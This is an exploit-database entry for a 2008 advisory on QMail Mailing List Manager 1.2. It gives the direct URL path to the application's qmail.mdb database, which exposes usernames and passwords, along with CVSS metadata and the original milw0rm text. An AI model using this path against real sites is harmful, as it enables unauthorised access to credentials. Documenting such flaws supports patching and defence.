QMail Mailing List Manager 1.2 (qmail.mdb) Database Disclosure Vulnerability

vendor:

QMail Mailing List Manager 1.2

by:

Ghost Hacker

4.3

CVSS

MEDIUM

Database Disclosure

200

CWE

Product Name: QMail Mailing List Manager 1.2

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:qmail_mailing_list_manager:qmail_mailing_list_manager_1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

QMail Mailing List Manager 1.2 (qmail.mdb) Database Disclosure Vulnerability

QMail Mailing List Manager 1.2 is vulnerable to a database disclosure vulnerability. An attacker can access the qmail.mdb database file which contains sensitive information such as usernames, passwords, and other data. This can be exploited by accessing the following URL: http://xxxx.com/[path]/database/qmail.mdb

Mitigation:

Upgrade to the latest version of QMail Mailing List Manager 1.2

Source

Exploit-DB raw data:

####################################################################################################
# QMail Mailing List Manager 1.2 (qmail.mdb) Database Disclosure Vulnerability                     #
# Â© Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : QMail Mailing List Manager 1.2                                                  #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=6                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/qmail.mdb                                                        #
####################################################################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark)    #
####################################################################################################

# milw0rm.com [2008-12-07]